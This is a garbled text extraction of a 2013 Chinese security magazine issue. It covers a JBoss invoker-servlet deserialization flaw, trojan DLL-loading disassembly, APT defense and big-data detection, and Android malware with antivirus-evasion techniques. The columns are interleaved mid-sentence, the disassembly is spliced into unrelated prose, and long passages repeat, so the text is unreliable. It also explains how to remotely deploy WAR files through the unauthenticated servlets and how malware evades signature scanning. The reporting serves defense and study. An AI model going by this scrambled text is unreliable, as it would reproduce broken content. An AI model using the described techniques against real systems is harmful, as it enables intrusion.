erServlet执行具有相应功能的代码。相同的还有/invoker/EJBInvokerServlet，用来处理这两个 .text:004040A7 loc_4040A7: ; CODE XREF: sub_403EC0+1DB j servlet请求是同一个类。 .text:004040A7 mov ecx, [ebp+var_134] .text:004040AD mov [ebp+var_118], ecx 受影响版本：JBOSS 4、5 .text:004040B3 cmp [ebp+var_118], 0 .text:004040BA jnz short loc_4040DC .text:004040BC cmp [ebp+hLibModule], 0 2.原理分析 .text:004040C3 jz short loc_4040DC .text:004040C5 mov edx, [ebp+hLibModule] 漏洞成因： .text:004040CB push edx ; hLibModule 当用户请求http://site/invoker/JMXInvokerServlet的时候，实际上是执行了一个Servlet，查看web.xml代 .text:004040CC call ds:FreeLibrary 码，如图所示： .text:004040D2 mov [ebp+hLibModule], 0 .text:004040DC .text:004040DC loc_4040DC: ; CODE XREF: sub_403EC0+1FA j .text:004040DC ; sub_403EC0+203 j .text:004040DC mov eax, [ebp+hLibModule] .text:004040E2 mov ecx, [ebp+var_8] 该程序会通过 .text:004040E5 xor ecx, ebp Loadlibrary来加载EXE .text:004040E7 call sub_4053CA 当前目录下的enlpu32.dll， .text:004040EC mov esp, ebp 并调用其导出的函数EnableL- .text:004040EE pop ebp PU，木马既可以在该DLL的 .text:004040EF retn DLLMAIN里做坏事，也可以在导出 这里调用InvokerServlet.java这个文件，分析其代码发现程序在获取session之后会判断session是否为 .text:004040EF sub_403EC0 endp 的EnableLPU函数里做坏事。而这种白 null，如果为null，则直接将其反序列化，代码如图所示： 利用基本只有发现一个杀一个了。

050 ｜ 互联网安全 互联网安全 ｜ 051 策 略 TACTICS SECURITY INSIGHT 2013.11 www.securityinsight.com

可以看到这里并未对session做验证。这就导致任何发送http://site/invoker/JMXInvokerServlet都能被处 理，可以先本地构造具有某些功能的类序列化后的字符串，放到POST请求中发送给JMXInvokerServlet处 这里processRequest()获取请求，MarshalledInvocation mi = (MarshalledInvocation) request.ge- 理。在JBOSS中有很多类可以创建文件或是下载文件，部署war程序，例如，调用MainDeployer类的deploy tAttribute("MarshalledInvocation");获取session信息，下面进一步判断session时候为null，如果为null 方法可以下在任意程序，调用DeploymentFileRepository类的store方法可以创建写入任意文件。 则执行mi = (MarshalledInvocation) ois.readObject();将请求反序列化。这里跟踪代码执行，这个 mbeanServer.invoker()函数执行传入的类和函数。 但是这里关键是如何去构造这个请求给/invoker/JMXInvokerServlet，这里我以blackhat大会上公布的一 个工具，跟踪调试它调用的jboss代码，发现了jboss实现序列化的方式，过程如下：

当我跟踪了各种invoker之后，发现org.jboss.invocation.http.interfaces.HttpInvokerProxy中的 MarshalledInvocation这个类实现了序列化，如图：

跟踪到最后是jboss会调用org.jboss.system.server. ServerInfo类中的getOSName()函数获取操作系统 信息。

052 ｜ 互联网安全 互联网安全 ｜ 053 策 略 TACTICS SECURITY INSIGHT 2013.11 www.securityinsight.com

此时我们的请求jboss执行的函数封装在invocation这个对象里，Jboss会调用MarshalledInvocation实例出 一个mi对象，事实上我们请求的函数都在mi里面，如图所示： 3. 技术验证

关于漏洞利用，在blackhat大会上曾经有黑客公布过利用工具，具体可以去网上自行搜索，

进一步跟踪代码，调用Util.invoker()方法，这个实际上就是构造POST包发送了，跟踪代码，如下：

红框中的字符串即为序列化后的代码。

构造header中的内容，这里externalURL是请求的uri，而mi是post的内容，然后在InputStream is = conn.getInputStream();这里发送请求。

054 ｜ 互联网安全 互联网安全 ｜ 055 策 略 TACTICS SECURITY INSIGHT 2013.11 www.securityinsight.com

如果是invoke，则可以在jboss中部署war包了，比如调用jboss.system中MainDeployer的deploy方法下 载我们构造好的war包，如图所示：

漏洞小结

由于jboss未对/invoker/JMXInvokerServlet

“ 以及/invoker/EJBInvokerServlet这两个 servlet的请求做验证，导致能够远程部署任意 “ war包。修补此漏洞，可以修改web.xml、 jboss-web.xml等配置文件开启身份验证。

可以看到POST中的内容，这里调用了MainDeployer 这个Mbean。

056 ｜ 互联网安全 互联网安全 ｜ 057 ISC专题 ISC ARTICLES SECURITY INSIGHT 2013.11 www.securityinsight.com

APT防御——未知攻，焉知防 近十几年，信息安全高速发展的前提下，由于我 流，它不会过气。在APT防御上我总结了几点：一个 于旸 绿盟科技高级研究员 们这个世界的改变，攻击者和防御者面临的问题发生 是靠技术，二要知道忽悠，另外还要知道这里面的坑。 了巨大变化。整个对抗形势不一样了。刚才我们说的 是环境，现在看看如何防御? 先看忽悠： 一位客户告诉我的，有人雇了个 很多人了解APT概念是从震网蠕虫开始的，这个事件让整 位美女，加客户网管的QQ，先聊天后来又视频， 目前信息世界和现实世界的交织导致了信息世 个世界了解了APT，知道了世界上有这样的一种方式：投入巨 最后搞定了网管的电脑，把客户的数据库拖了。这 界承载了比以前更多的价值。换句话说，人类更多的 大的资源去进行一件目的性非常强，而且达到非常巨大的效果 类事件如何对付?这是需要思考的问题。 的事。传统的对抗可能需要投入更加巨大人力，或是需要通过 财富、荣誉、权利被加载在信息世界里，在这样的背 景下攻击获益增加了，被攻击遭到的损失也增加了。 一些物理上的接触才能做成，现在一个程序就可以搞定了。 据相关专家调查发现，最近几年发现和协助追查 近十几年来，信息世界的发展令防御方也不一样。10 的多起APT攻击中，发现公司老板秘书室是个薄弱 年前世界上95%的网站都非常容易被攻击，今天完全 震网蠕虫也有不好的结果，就是它让人们认为APT就是政 环节，经常是APT重点目标。这是忽悠的方面。 府和军队的游戏，和普通企业关系不太大。 不是这样。对攻击者而言，攻击门槛大大增加了。现 在我们说浏览器漏洞、IE漏洞，微软发布一个IE漏洞 看技术： 电影“战争之王”讲的是军火商的 是很大的事情，10年前我们发现IE漏洞都不好意思报 再 故事，其实信息世界同样有军火商，这就是Vupen 告，我们觉得这个东西太没有价值了，报告出去会被 和Exodus Intel，他们的主要客户就是政府和军 APT是网络攻击的子集 这个网站——先把网站用了什么服务器、跑了什么应用 笑话的。但现在一个IE漏洞微软开出最高的奖励价格 队，提供的是网络世界的武器---攻击工具。我们 程序等信息留着，这些东西什么时候爆出漏洞，就跟网 是多少? 10万美金！ 攻击门槛成本大大增加，但攻击 提APT不能不提他们，此外，还有一些更隐蔽的团 APT其实就是网络攻击的一个子集。只不过比一 管抢时间。如果你需要一个小时把所有服务器打上补 获益也大大增加了，花10万美金买一个漏洞可以得到 体和组织不是以公司形式存在的，也在做类似的 般的网络攻击可能要复杂一些，APT攻击一般是什 丁，我就利用半个小时把服务器攻击了。攻击者还要跟 几百万美金的收入，那这个成本就可以忽略不计了。 事情。 么样的？它是分步骤的：首先要实现入侵，控制一 同行抢时间，赶在别的攻击者之前把网站入侵了，帮着 个结点之后植入后门，利用这个后门进一步的做更 把网站打上补丁，让别的攻击者入侵不进来。 高成本的攻击带来更高价值的收益，反过来，防 不久前曝光了一份和美国国家安全局的安全合 深层次的内部渗透，然后实现目标。目标可能是搞 御成本也会相应增加。因为必须要防，一旦遭到攻击 同，主要内容就是二进制分析和攻击代码服务。 一些破坏，或者是窃取一些数据，达到目的后会把 温瑞安的小说《凄惨的刀口》有这么一段话：“一 受到的损失会大大的增加。防御成本增加现在变得可 痕迹擦干净，安全的撤退。但用这种程序化的东西 个人若要暗杀另一个人。只要他够耐心，够狠够绝够时 以接受了。为了防御这些高级攻击，比如白名单列表 今年3月份的时候，我在某安全会议上向业界 诠释APT不是特别的确切。 机，武功再高的人也防范不着。”意思就是你必须一直 里的可以用，别的不可以用，十年前这种方案谁能买 分享果一种技术。这个技术本身对攻击来说是非常 保持警惕，对APT也要如此。 一台设备几十万美金，放在10年前谁会买?今天完全 有利的，因为它所涉及到方法可以绕过很多种防御。 APT的字面含义：高级持续性威胁。通俗的解 不一样了。 当时和业界分享原因也是希望相关企业，包括操作 释，我的理解它就是有目的、有资源、有耐心的入 系统厂商和防御厂商能把这个做起来。就在我公开 侵。首先做这种攻击的目的非常明确，和我们在新 现在大家提出了很多防御方法，从不同的角度。 这个技术的那天，我发现Vupen公司就利用这个技 闻上看到的天才少年黑客攻击了多少网站不一样， 很多公司提出了各种各样的方案，这是在一个大的浪 术：他们在3月份用这个技术参加个黑客大赛，并 不是说看谁好欺负就欺负谁一下。为了实现攻击目 世界已经不一样 潮之下各显神通。我们也有自己的尝试，构建了TAC 赢了一场比赛。另外他们的Twitter暗示了知道这 标，一般愿意投入资源（可能是人、资金，用于雇 系统，其实跟大家没有特别大的区别，只是思路的不 个技术。作为安全公司，我们和这种“卖军火”的 佣团队、购买漏洞)，总之是愿意花钱为攻击购买相 网上有1张广为传播的照片，那就是2005年教皇选 同。 企业肯定不一样的，它们拿这种技术就是当“军 关的情报作为铺垫。 举和2013年的教皇选举照片的对比：同一个地方、同 火”卖去了。 一个角度，但八年时间，世界不一样了。教皇本人也用 如何做得更好 一旦出现漏洞，网管就很辛苦，忙着打补丁，但 iPad。这些照片是我们这个世界的缩影。今天我们每 攻击者更辛苦。很多攻击者要入侵网站并不是说每 一个人同时生活在两个世界里，一个是网络世界，一个 我最想向大家说的是，面对这样的新形式威胁之 一个人都可以指哪打哪，目前网络环境已经不是这 是现实世界。随着时间的推移，两个世界的融合和交织 下，我们如何做的更好?。安全界每隔几年会翻出一 样。他们要入侵一个网站就会一直惦记着，会盯着 越来越紧密。在这样的背景下，入侵也变得不一样了。 个词，今年可能就是大数据，但是有一个老词叫 “Know your enemy”。我觉得这个词不是时髦的潮

058 ｜ 互联网安全 互联网安全 ｜ 059 ISC专题 ISC ARTICLES SECURITY INSIGHT 2013.11 www.securityinsight.com

关于坑 APT分析与大数据计算思考 崔翔 刘潮歌 程学旗 谷歌浏览器中的高级设置中，同步默认是勾 要做APT防御一定要知道这些坑。 中国科学院计算技术研究所、中科院网络数据科学与技术重点实验室 选的。假设你是Chrome而用户，并使用这个帐 号，这些东西就会自动同步。换句话说攻击者如 虽然存在一些较通用的防御思路，但从目前来 果得到了Google帐号，绝对不简单是能看一看 看，实用的防御方案仍然很大程度上依赖于对攻击 Gmail这么简单。这个默认设定导致攻击者一旦 技术的深入了解。针对APT攻击，我从“未知生、 拿到你的谷歌帐号，攻击者可以在自己的机器上 焉知死”衍生出了一句话“未知攻、焉知防”。 网络空间和国家大战略环境下 包括先进的技术手段和社会工程学方法，一步一步 用你自己的帐号给Chrome装恶意插件，然后这 的APT 获取进入目标内部并逐渐提升权限。APT综合运用 个插件会自动同步到你的系统上。这就是坑。苹 了多种技术手段，因此，它更多地是一种战术层面 果也是一样的，一旦你的苹果手机ID被别人拿 的网络战的表现形式。 随着互联网技术的不断发展及其广泛应用，网 了，不是简单的冒充你的身份跟别人联系，他可 络空间在军事上的重要性日益显现，已经成为一个 以往你的iPhone上装程序。 在今年的RSA信息大会上，APT与大数据成为 新兴的战略领域，被称为继陆、海、空、天之后的 两大热点，可以说，在云计算时代，海量数据处理 “第五维作战空间”。以美国为首的发达国家高度 另一个“坑”是城域网“缓存加速解决方案”。 已经成了不可逆挡的趋势，而安全更是需要紧跟潮 关注网络空间安全，不断加大网络与信息安全投入 某些此类方案的实现很不安全，缓存易被毒化。 流。大数据作为革命性的解决方案以应对信息安全 ，美国网络战团厉兵秣马，将在2015年秋季前组 发几十个请求就可以毒化一个文件，然后整个城 的全面挑战，“可供挖掘的数据量巨大,极其丰富多 建40支网络安全部队，其中13支主要专注于进攻 市下载该文件得到的都是攻击者的数据。如果毒 变，这为企业和社会创造了巨大的机会，不过同样 性行动[ ]。 化那些自动更新程序的URL，可以轻松控制整个 是这些数据，也为对手提供了新的攻击载体”]。从 城市的电脑。 APT应对的角度来看，大数据分析为APT检测提供 纵观近年发生的重量级网络安全事件，带有国 了新能力和新手段。 家和政治利益色彩的APT攻击，可谓多年深藏功与 名。“震网”潜伏3年，造成伊朗纳坦兹核工厂上 千台铀浓缩离心机故障，成为公开报道的第一个成 功攻击工业系统而且是核设施的蠕虫；“红色十月” 持续5年，主要针对全球多个国家的外交和政府机 构发动攻击，来自欧洲、亚洲、大洋洲和美洲至少 三十九个国家深受其害。 基于大数据深度分析的APT检测

1 为什么需要大数据分析 APT的特点表现在A与P上，A代表Advanced， 主要表现在攻击水平高超，即攻击行为特征难以提 APT使网络威胁从散兵游勇式的随机攻击变成 取、单点隐蔽性强、攻击渠道多样化、攻击空间不 有目的、有组织、有预谋的群体式攻击，这给传统 确定[ ]。P代表Persistent，主要表现在攻击过程 的以实时监测、实时阻断为主体的传统检测技术带 持续时间长、攻击成功后隐藏时间长。综合来看， 来了新的挑战[ ]： 网络空间和国家战略环境下的APT不同于传统的网 络入侵，这些新型的攻击和威胁以系统破坏和信息 第一，APT攻击行为特征难以提取。APT经常 窃取为目的，更具针对性，是特定组织或机构利用 采用0day漏洞获取权限，通过未知、特种木马进 先进的综合攻击手段针对特定的目标（如国家、行 行远程控制。传统基于特征匹配的检测设备总是要 业、组织、个人）进行秘密的、长期的、持续的网 先捕获恶意代码样本，才能提取特征并基于特征进 城域网“缓存加速解决方案”的实现很不安全，缓存易被毒化。 络攻击。APT攻击通常会综合利用多种攻击手段，

060 ｜ 互联网安全 互联网安全 ｜ 061

行攻击识别，这就存在先天的滞后性。 从中我们可以看出APT从发起攻击到被发现的延迟 时间长达3-8年之久，可以说APT时代，传统的检 第二，APT攻击单点隐蔽性强。为了躲避传统 测技术感知能力不再敏锐。 检测设备，APT更加注重动态行为和静态文件的隐 蔽性。例如通过隐秘通道、加密通道避免网络行为 2. 现有检测方法 被检测，或者通过伪造合法签名的方式避免恶意代 码文件本身被识别，这就给传统基于签名的检测带 当前的APT检测方法都是围绕APT攻击步骤展 来很大困难。 开的，主要可以分为恶意代码检测、主机应用保护 和网络入侵监测这三类： 第三，APT攻击渠道多样化。从目前已被曝光 的知名APT事件来看，常用的攻击方式有0day漏 恶意代码检测类主要覆盖APT攻击过程中的单 洞利用、可移动存储介质摆渡、鱼叉式钓鱼邮件 点攻击突破阶段。它是检测APT攻击过程中的恶意 、水坑攻击等多种渠道。传统的检测方法一旦漏掉 代码投送过程。检测方法通常是在互联网入口点对 一种攻击渠道，便会漏检且无法回溯。 网页、邮件、文件共享等可能携带的恶意代码进行 检测。 第四，APT攻击空间不确定任何一个网络暴露 点都有可能是攻击的目标。APT攻击走哪条路径不 主机应用保护类主要覆盖APT攻击过程中的单 得而知，攻防双方信息不对称。 点攻击突破和数据收集上传阶段[7]。检测方法通常 是在系统内各主机节点上部署DLP/HIPS产品。 第五，APT攻击持续和隐蔽时间长。APT攻击 网络入侵监测类主要覆盖APT攻击过程中的RAT 分为多个步骤，从最初的信息搜集，到信息窃取并 的命令与控制（C&C）通道构建与应用阶段，通 外传往往要经历几个月甚至更长的时间。而传统的 过在网络边界处部署入侵检测系统来检测APT攻击 检测方式是基于单个时间点的实时检测，难以对跨 的命令与控制通道。虽然APT攻击所使用的恶意代 度如此长的攻击进行有效跟踪。慢速、分阶段实施 码变种多且升级频繁，但恶意代码所构建的命令控 的APT攻击淹没在大数据中。大数据的价值低密度 制通道通信模式并不经常变化，因此，该类方案成 性，使得安全分析工具很难聚焦在价值点上。下图 功的关键是如何及时获取到各APT攻击手法的命令 为若干典型APT事件从存在到发现的时间跨度， 控制通道的检测特征。 网络空间和国家大战略环境下 包括先进的技术手段和社会工程学方法，一步一步 的APT 获取进入目标内部并逐渐提升权限。APT综合运用 了多种技术手段，因此，它更多地是一种战术层面 的网络战的表现形式。 随着互联网技术的不断发展及其广泛应用，网 络空间在军事上的重要性日益显现，已经成为一个 在今年的RSA信息大会上，APT与大数据成为 新兴的战略领域，被称为继陆、海、空、天之后的 两大热点，可以说，在云计算时代，海量数据处理 “第五维作战空间”。以美国为首的发达国家高度 已经成了不可逆挡的趋势，而安全更是需要紧跟潮 关注网络空间安全，不断加大网络与信息安全投入 流。大数据作为革命性的解决方案以应对信息安全 ，美国网络战团厉兵秣马，将在2015年秋季前组 的全面挑战，“可供挖掘的数据量巨大,极其丰富多 建40支网络安全部队，其中13支主要专注于进攻 变，这为企业和社会创造了巨大的机会，不过同样 性行动[ ]。 是这些数据，也为对手提供了新的攻击载体”]。从 APT应对的角度来看，大数据分析为APT检测提供 纵观近年发生的重量级网络安全事件，带有国 了新能力和新手段。 家和政治利益色彩的APT攻击，可谓多年深藏功与 名。“震网”潜伏3年，造成伊朗纳坦兹核工厂上 千台铀浓缩离心机故障，成为公开报道的第一个成 功攻击工业系统而且是核设施的蠕虫；“红色十月” 持续5年，主要针对全球多个国家的外交和政府机 构发动攻击，来自欧洲、亚洲、大洋洲和美洲至少 三十九个国家深受其害。 基于大数据深度分析的APT检测

1 为什么需要大数据分析 APT的特点表现在A与P上，A代表Advanced， 主要表现在攻击水平高超，即攻击行为特征难以提 APT使网络威胁从散兵游勇式的随机攻击变成 取、单点隐蔽性强、攻击渠道多样化、攻击空间不 有目的、有组织、有预谋的群体式攻击，这给传统 确定[ ]。P代表Persistent，主要表现在攻击过程 的以实时监测、实时阻断为主体的传统检测技术带 持续时间长、攻击成功后隐藏时间长。综合来看， 来了新的挑战[ ]： 网络空间和国家战略环境下的APT不同于传统的网 络入侵，这些新型的攻击和威胁以系统破坏和信息 第一，APT攻击行为特征难以提取。APT经常 窃取为目的，更具针对性，是特定组织或机构利用 采用0day漏洞获取权限，通过未知、特种木马进 先进的综合攻击手段针对特定的目标（如国家、行 行远程控制。传统基于特征匹配的检测设备总是要 业、组织、个人）进行秘密的、长期的、持续的网 先捕获恶意代码样本，才能提取特征并基于特征进 络攻击。APT攻击通常会综合利用多种攻击手段，

ISC专题 ISC ARTICLES SECURITY INSIGHT 2013.11 www.securityinsight.com

行攻击识别，这就存在先天的滞后性。 从中我们可以看出APT从发起攻击到被发现的延迟 3. 依靠大数据处理技术应对APT 第二，大数据小样本异常检 解决时间上的不确定。APT攻 时间长达3-8年之久，可以说APT时代，传统的检 攻击 测。大数据对安全厂商而言，最 击过程中，攻方与目标之间的通 第二，APT攻击单点隐蔽性强。为了躲避传统 测技术感知能力不再敏锐。 重要的是如何将事件的模式、 信链路是可控的，从链路中获取 检测设备，APT更加注重动态行为和静态文件的隐 上述三种现有的检测方案仅着 攻击的模式、时间和空间上的 的流量真实完整地记录攻击过程 蔽性。例如通过隐秘通道、加密通道避免网络行为 2. 现有检测方法 重于APT攻击的某一阶段，而基 特征，总结抽象出来一些模型， 且不会被攻方躲避和篡改。 被检测，或者通过伪造合法签名的方式避免恶意代 于大数据分析的APT检测技术则 变成大数据工具可以帮助发现的 码文件本身被识别，这就给传统基于签名的检测带 当前的APT检测方法都是围绕APT攻击步骤展 覆盖了整个APT攻击过程。大数 一些模式。 因此，将数据存储下来，形 来很大困难。 开的，主要可以分为恶意代码检测、主机应用保护 据检测方案是通过全面采集网络 成历史的模式“记忆库”，在历 和网络入侵监测这三类： 中的原始网络数据包、业务和安 第三，关联分析。建立在相 史模式下，收集的任何数据都 第三，APT攻击渠道多样化。从目前已被曝光 全日志，形成大数据，再采用大 关关系分析法上的预测是大数据 能 “重放”。 的知名APT事件来看，常用的攻击方式有0day漏 恶意代码检测类主要覆盖APT攻击过程中的单 数据分析技术和智能分析算法来 的核心，大数据分析是希望获得 洞利用、可移动存储介质摆渡、鱼叉式钓鱼邮件 点攻击突破阶段。它是检测APT攻击过程中的恶意 检测APT。此外，通过大数据统 之前无法获得的洞察力，统计分 、水坑攻击等多种渠道。传统的检测方法一旦漏掉 代码投送过程。检测方法通常是在互联网入口点对 计分析，还可能做到：尽管没发 析可以识别出异常情况，但是它 一种攻击渠道，便会漏检且无法回溯。 网页、邮件、文件共享等可能携带的恶意代码进行 现攻击行为，却可以预先发现攻 并不理解安全、不知道具体的原 检测。 击者。这就好比Google统计发现 因，只是看到了相关关系。关联 大数据时代全域级 第四，APT攻击空间不确定任何一个网络暴露 某个地区针对某种传染病的搜索 分析所涉及的技术主要包括日志 APT对抗能力建设 点都有可能是攻击的目标。APT攻击走哪条路径不 主机应用保护类主要覆盖APT攻击过程中的单 量陡增，就可以知道该地区爆发 采集、业务流程分析、关联分析 得而知，攻防双方信息不对称。 点攻击突破和数据收集上传阶段[7]。检测方法通常 了该传染病，但Google并不需要 引擎的建立以及持续更新的知识 1.大数据技术会主导国家间的信 是在系统内各主机节点上部署DLP/HIPS产品。 知道该传染病的病理。 库。其中日志采集是关联分析的 息防御战 第五，APT攻击持续和隐蔽时间长。APT攻击 网络入侵监测类主要覆盖APT攻击过程中的RAT 基础，算法决定关联分析的能 分为多个步骤，从最初的信息搜集，到信息窃取并 的命令与控制（C&C）通道构建与应用阶段，通 大数据分析检测类采用全流量 力，挖掘业务场景才是关联分析 目前大数据在网络空间安全、 外传往往要经历几个月甚至更长的时间。而传统的 过在网络边界处部署入侵检测系统来检测APT攻击 审计、大数据小样本检测和关联 的价值所在，难点也在于此。关 互联网、网络通信和金融领域应 检测方式是基于单个时间点的实时检测，难以对跨 的命令与控制通道。虽然APT攻击所使用的恶意代 分析三种方式来检测威胁。 联分析主要是要求对该业务很熟 用广泛，有良好的数据积累。回 度如此长的攻击进行有效跟踪。慢速、分阶段实施 码变种多且升级频繁，但恶意代码所构建的命令控 悉的领域专家，来给出大量的具 顾今年满城风雨的斯诺登系列事 的APT攻击淹没在大数据中。大数据的价值低密度 制通道通信模式并不经常变化，因此，该类方案成 第一，全流量审计。全流量 有实际意义的业务场景和业务规 件，“主干道”和“码头”监控 性，使得安全分析工具很难聚焦在价值点上。下图 功的关键是如何及时获取到各APT攻击手法的命令 审计的原理是对链路中的流量 则，难的不是算法，难的是丰富 项目表明对海量元数据的分析， 为若干典型APT事件从存在到发现的时间跨度， 控制通道的检测特征。 进行深层次的协议解析和应用 的领域经验抽象成业务规则并进 有助于情报机构迅速缩小包围圈 还原，识别其中是否包含攻击行 行持续积累总结，如果不具备持 ，锁定监控目标的活动轨迹；巧 为。检测到可疑攻击行为时，在 续更新的知识库，那是没有任何 言计划对于计算机和设备的元数 全流量存储的条件下，回溯分析 生命力的。 据的收集使APT攻击投放武器更 相关流量。这样，传统的检测产 有针对性；XKeyScore可以为 品将对历史流量具备“记忆”能 4. 大数据分析检测APT解决的 APT攻击者提供强大的高速查询 力，形成基于记忆的智能检测系 不确定 能力，提高攻击效率。这些无不 统，其检测对象不再是实时时间 体现着大数据时代的特征。 点，而是历史时间窗；对于漏报 解决空间上的不确定。APT 的攻击行为，也可通过对历史流 攻击过程中，攻击者的攻击路径 可以说，在国家信息间的信息 量进行回溯审查的方式进行二次 不确定，但攻击路线全集确定。 防御战中，谁拥有了关键核心技 检测和关联分析，从而具备更强 大数据采用全流量审计策略，扩 术，谁就掌握了主导。爱德华· 大的检测能力。 大了检测域，可以提高截获攻击 斯诺登就像《皇帝的新衣》里那 路径的概率。 个小孩子，揭开了大家心知肚明

062 ｜ 互联网安全 互联网安全 ｜ 063 ISC专题 ISC ARTICLES SECURITY INSIGHT 2013.11 www.securityinsight.com

的网络监控秘密。只不过，随着“棱镜门”的发酵，我们发现，美国的网络 Android平台的安全隐患 监控已经在大数据盛行的今天走在了众家之前，不得不值得深思。 张亮 TrustLook 公司CEO 2. 建立国家级安全知识库

国家级安全知识库是联合国内重要信息系统单位、基础电信运营商、网 络安全商、软件厂商和互联网企业建立的知识库。这其中应该包括信息安 全漏洞的共享 、特征库、应急预案、备案库、风险评估等等。大数据 “做一个动画，让进度条从0涨到100%，然后 分析的挑战在于如何通过各种分析大海捞针，反向区别出不同的动机， 显示杀毒完成，给用户一个心理上的安慰。” 从而找到危害最大但却最不显眼的高度有目标的攻击。与知识库交互的不仅 仅是海量的数据以及分析模型，人工的成分也愈发重要。知识库是对情报、 - XCon2009上，当被问到如何看待在当时做 资源和能力的一种整合，这是一种安全的“云”。通过建立国家级安全知识 一款手机杀毒软件时，某位安全大牛嘉宾如是说。 库我们可以建立下图所示的安全模型，自顶向上，首先通过全流量审计加元 数据提取技术获取数据源，知识库可理解数据的含义；然后通过大数据分析 技术进行关联分析、误用检测、异常检测和攻击回溯，这样便可进行一次提 在移动设备爆发的早期，安全并没有成为关注的焦 纯，找到偏离正常业务模式的行为作为最顶层的输入，当然这需要利用知识 点。而今天智能手机已成所有人的标配，每个人的手 库提供的特征模型、基础信息库以及因果关系模型等作为关联分析的基础； 图1 企业市场中Android只占有35%的份额 机上，都存储着通信录，照片和视频；可以收发邮 最后，也是最关键的，是核心的精英团队，安全毕竟是人与人的对抗，此时 件，短信和支付，甚至直接通过MDM访问企业内网。 利用知识库中传统的检测工具进一步探照与刺探，分析攻击原理，用专家的 对于APT攻击者来说，移动设备已成为重要性不亚于 经验与智慧进行完备的对抗，相信APT的检测一定会在不远的将来迎来新的 PC的目标。 光景。

这里有一个有趣的数据：有62%的企业选择了使 用iOS作为移动操作系统，而Android只占据了29% 的份额。这明显与Android在个人用户中70%的占有 率不成正比。之所以造成这个结果，安全性是一个很 大的原因。 图2 世界范围70%的智能手机安装了Android系统

Android是一个开放的系统，而开放是以牺牲安全为代价的。相比被Apple严格控制的iOS，Android开发 者有更高的权限 - 只要用户一次点击授权，应用就可以访问从通讯录，短信到SD卡里的各种个人信息；缺乏 审核的市场；家常便饭般的ROOT，层出不穷的第三方ROM和预装软件，部分机型对系统升级支持缓慢 - 只 有6%的Android系统是最新版，相比之下iOS7在发布的几天内就获得了超过60%的份额。

大多数用户会把安全交给手机杀毒软件，同时尽可能选用官方，正规的应用市场作为安全法则。那么杀毒 软件，应用市场审核到底有多可靠？

064 ｜ 互联网安全 互联网安全 ｜ 065 ISC专题 ISC ARTICLES SECURITY INSIGHT 2013.11 www.securityinsight.com

应用市场的安全性 - Craig Young的故事 手机杀毒软件：特征查杀 vs 行 基于签名的查杀主要面临以下的 为查杀 3个问题： “此应用可以让你快速访问Google自带的股票查询功能，但同时也会 彻底侵犯你的隐私。如果你想作死，那就下载吧！这个APP目前还在测 杀毒软件可以识别出这个恶意软件吗？Craig 1 只能查杀已知的威胁。对于新出现的恶意软件， 试中，任何人任何时候都不应该安装它。” 用了5款手机杀毒软件检测此应用，结果如下： 漏洞利用代码（Exploit）等，通常无能为力。 -安全研究者Craig Young上传了一款这样的应用到Google Play，定 价150美元。Craig只想看看它能活多久。 Lookout - Safe Craig Young的应用就是一个典型例子。在 Norton - No Risk 愈演愈烈的APT攻击中，有一定实力的攻击者都不 Sophos - Clean 会利用那些已经广为人知的后门和漏洞，一个单独 Avast - Zero Problems 定制的后门或者0day exploit就足以让签名查杀失效。 Trend Micro Mobile Security - No Threats Found 2 反馈周期长。一个新的恶意软件从被杀毒软件厂 商截获样本，到人工分析，开发出签名，发布，有 为什么杀毒软件会对Craig的应用熟视无睹？ 时长达几周的时间。但黑客是不会等这么久才发起 原因很简单：它们不认识这个APP。 攻击的，在更新发布前用户可能早已哀鸿遍野。

传统的手机杀毒软件仍然依赖PC时代基于签 3 易于绕过。黑客们常用的“免杀”技术已趋于成 名的查杀技术，即通过特征码的匹配来识别恶意软 熟。黑客们有现成的工具定位到每种杀毒软件识别 件/恶意行为。杀毒软件公司需要首先截获恶意软 的特征码在文件中位置，如果在数据上，可以略作 件，分析并找出一些可作为识别依据的外部特征， 修改，如果在代码上，可以做等价指令替换。修改 即“签名”，将其加入病毒库。以后再次见到满足 了特征码后，软件就“免杀”了。同时，还有很多 这些特征的软件，就可以判定为恶意软件。而如果 的第三方软件保护工具可以实现类似功能，比如可 一个软件没有和病毒库里的任何一个签名匹配上， 执行文件的“加壳”，脚本文件中的代码混淆， 就被作为正常软件放行了。 APK文件的重新打包等。

签名查杀的唯一优点是高效，可以实现同步检 测。所以至今仍在被很多安全厂商所用。 图3 Craig在Google Play上的恶搞

应用市场能保证应用的安全吗？就在8月，来自 豪购买了，可能是安全公司）。现在Android Verify TrustLook - 基于行为的检测平台介绍 nCircle VERT team的Craig Young（此人曾在 已经会将其识别为“间谍软件” - 想绕过这个检测， DEFCON黑客大会上演示利用Android token劫持任 只需要把应用的名字改一下。 TrustLook提供了一个基于行为查杀的解决方案。TrustLook会在一个虚拟环境中把待检测应用安装 意Google应用的访问权限）做了开篇所述的实验：他 并且执行，根据行为分析数据，对应用行为做深度评估，根据产品风险模型对应用进行分析，自动生成报 写了一个可以偷窃通信录，上网记录，更改浏览器设 从这件事来看，应用市场完全不能保证应用的安 告。它解决了签名查杀所面临的问题： 置的恶意应用app，写了恶搞式的介绍，并要价150 全。事实上，Google Play虽有上百万应用，但 刀，上传到了Android的官方应用市场Google Play。 Google内部只有一个人负责市场上的应用安全，通 1 可以查杀未知的威胁 - 我们的平台100%基于行为数据，可以看到传统手机杀毒软件看不到的问题。 常是有人举报才会处理。 结果令人大跌眼镜 - Google Play不仅允许其发 2 全自动分析 - 在云端有大量的沙盒（虚拟机）批量执行并检测提交上来的应用，完全无需人工，几分钟 布，更是用了一个月才发现并将其下架（期间还有土 内即可得到详尽的分析报告。

066 ｜ 互联网安全 互联网安全 ｜ 067 ISC专题 ISC ARTICLES SECURITY INSIGHT 2013.11 www.securityinsight.com

以Craig的例子来说，以下是TrustLook平台的分析结果：

图5 TrustLook平台识别出的恶意行为

可以看出，窃取手机硬件ID，

读取浏览器记录，并将这些敏

感信息通过HTTPS连接发送走

等行为均留下了记录。不仅如

此，TrustLook可以分析到更

图4 Craig的应用在TrustLook平台上的评估结果 细的粒度：

“评分”代表了安全威胁的程度，满分10分，得分越高则越危险。7分已属高危软件。 以下是平台分析出的恶意行为：

图6 TrustLook分析出的恶意行为细

节，包括HTTP发送用户的设备ID

068 ｜ 互联网安全 互联网安全 ｜ 069 ISC专题 ISC ARTICLES SECURITY INSIGHT 2013.11 www.securityinsight.com

